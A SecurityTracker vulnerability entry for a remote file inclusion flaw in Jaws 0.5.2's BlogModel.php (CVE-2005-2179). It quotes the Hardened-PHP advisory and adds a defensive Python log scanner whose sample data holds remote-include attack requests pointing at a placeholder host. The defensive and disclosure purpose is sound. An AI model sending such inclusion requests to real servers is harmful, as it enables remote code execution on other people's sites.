


Category:   Application (Generic)  >   Jaws
Vendors:
Jaws 'BlogModel.php' Include File Bug Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1014395
SecurityTracker URL:
CVE Reference:   CVE-2005-2179
Updated:  Jun 24 2008
Original Entry Date:  Jul 6 2005
Impact:   Execution of arbitrary code via network, User access via network
Vendor Confirmed:  Yes  
Version(s): 0.5.2 and prior versions
Description:   An include file vulnerability was reported in Jaws. A remote user can execute arbitrary commands on the target system.

The 'BlogModel.php' script does not properly validate user-supplied input in the 'path' parameter. If 'register_globals' is set to 'on' in the 'php.ini' configuration file, then a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

The vendor was notified on July 5, 2005.

Stefan Esser of the Hardened-PHP Project reported this vulnerability.

The original advisory is available at:

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
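
A defender-side check for the condition in the Description above, added here as an example (it is not part of the SecurityTracker entry or the Hardened-PHP advisory): it reports whether a php.ini fragment enables 'register_globals' and flags access-log requests to 'BlogModel.php' whose 'path' query value is a URL. The Apache-style log format, the '/site/' prefix, the hosts and the sample data are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# A value starting with scheme:// is a URL or stream wrapper, not a local path.
REMOTE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)
# Request line of an Apache common/combined log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def register_globals_on(ini_text):
    """True if the last register_globals directive in the text enables it."""
    enabled = False
    for line in ini_text.splitlines():
        line = line.split(";", 1)[0].strip()          # strip php.ini comments
        m = re.match(r"register_globals\s*=\s*(\S+)", line, re.I)
        if m:
            enabled = m.group(1).strip('"').lower() in ("on", "1", "true", "yes")
    return enabled

def remote_path_requests(log_lines, script="BlogModel.php", param="path"):
    """Return (line_no, decoded_value) for requests to `script` whose `param` is a URL."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/" + script):
            continue
        for value in parse_qs(url.query).get(param, []):   # percent-decoded
            if REMOTE.match(value.strip()):
                hits.append((n, value))
    return hits

# Constructed sample data: the /site/ prefix, hosts and addresses are placeholders.
SAMPLE_INI = "; constructed fragment\nregister_globals = On\n"
SAMPLE_LOG = [
    '198.51.100.7 - - [06/Jul/2005:10:01:02 +0000] '
    '"GET /site/BlogModel.php?path=http%3A%2F%2Fhost.example%2Fx HTTP/1.1" 200 512',
    '198.51.100.7 - - [06/Jul/2005:10:01:09 +0000] '
    '"GET /site/index.php?path=http://host.example/x HTTP/1.1" 200 2048',
    '203.0.113.9 - - [06/Jul/2005:10:02:00 +0000] '
    '"GET /site/BlogModel.php?path=include HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    print("register_globals enabled:", register_globals_on(SAMPLE_INI))
    for n, value in remote_path_requests(SAMPLE_LOG):
        print(f"log line {n}: path={value!r}")
```

With 'register_globals' on, the same variable can also arrive in POST data or a cookie, which an access log does not record, so an empty result does not rule out an attempt.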

Message History:   None.

 Source Message Contents

Subject:  [Full-disclosure] Advisory 07/2005: Jaws Multiple Remote Code


                        Hardened-PHP Project

                      -= Security  Advisory =-

     Advisory: Jaws Multiple Remote Code Execution Vulnerabilities
 Release Date: 2005/07/06
Last Modified: 2005/07/06
       Author: Stefan Esser []

  Application: Jaws <= 0.5.2
     Severity: Multiple Security Holes in Jaws allow remote code
         Risk: Critical
Vendor Status: Vendor doesn't consider this serious enough


   Quote from
   "Jaws is a Framework and Content Management System for building 
   dynamic web sites. It aims to be User Friendly giving ease of use 
   and lots of ways to customize web sites, but at the same time is 
   Developer Friendly, it offers a simple and powerful framework to 
   hack your own modules."
   An audit of Jaws revealed that it uses XML_RPC and is therefore
   vulnerable to the known eval() hole. Additionally the Blog gadget
   is vulnerable to a remote URL inclusion vulnerability.
   The vendor, although we contacted him, credits Gulftech for the
   XML_RPC vulnerability. He also believes that a remote URL inclusion
   vulnerability that is only exploitable with register_globals
   turned on, which is the default on most servers, is not serious.
   Because of this they released an updated version of Jaws that
   is still vulnerable to remote code execution through the Blog


   A quick audit of Jaws revealed that they are using the XMLRPC
   library. This audit also revealed that the file BlogModel.php
   of the Blog gadget suffers a remote URL include vulnerability 
   triggered by the global variable 'path'.
   Unfortunately for the users of Jaws, the vendor believes that
   a remote URL inclusion vulnerability is not serious and 
   therefore they released an update to Jaws in response to our
   notification that only upgrades the bundled XMLRPC library.
   This means, although they know better, the Jaws developers
   expose their users to a serious security hole in their Blog
   Impudent like they are, they are also crediting the XMLRPC
   finding to Gulftech, although we contacted them. But this is 
   not uncommon. Secunia and some Linux vendors still claim that
   Gulftech has informed the PEAR developers about this
   vulnerability, which is of course a lie.

Proof of Concept:

   The Hardened-PHP Project is not going to release an exploit 
   for this vulnerability to the public.

Disclosure Timeline:

   05. July 2005 - Contacted Jaws vendor via email
   05. July 2005 - Vendor releases Jaws 0.5.2 which only upgrades
                   the bundled XML_RPC
   06. July 2005 - Public disclosure


   Because there is actually no fix for this vulnerability we
   recommend that you simply do not use Jaws at all. Code that does
   require register_globals turned off to be secure should be 
   Alternatively you can simply install the Hardening-Patch to 
   stop this and all other remote URL include vulnerabilities.


   pub  1024D/0A864AA1 2004-04-17 Hardened-PHP Signature Key
   Key fingerprint = 066F A6D0 E57E 9936 9082  7E52 4439 14CC 0A86 4AA1

Copyright 2005 Stefan Esser. All rights reserved.
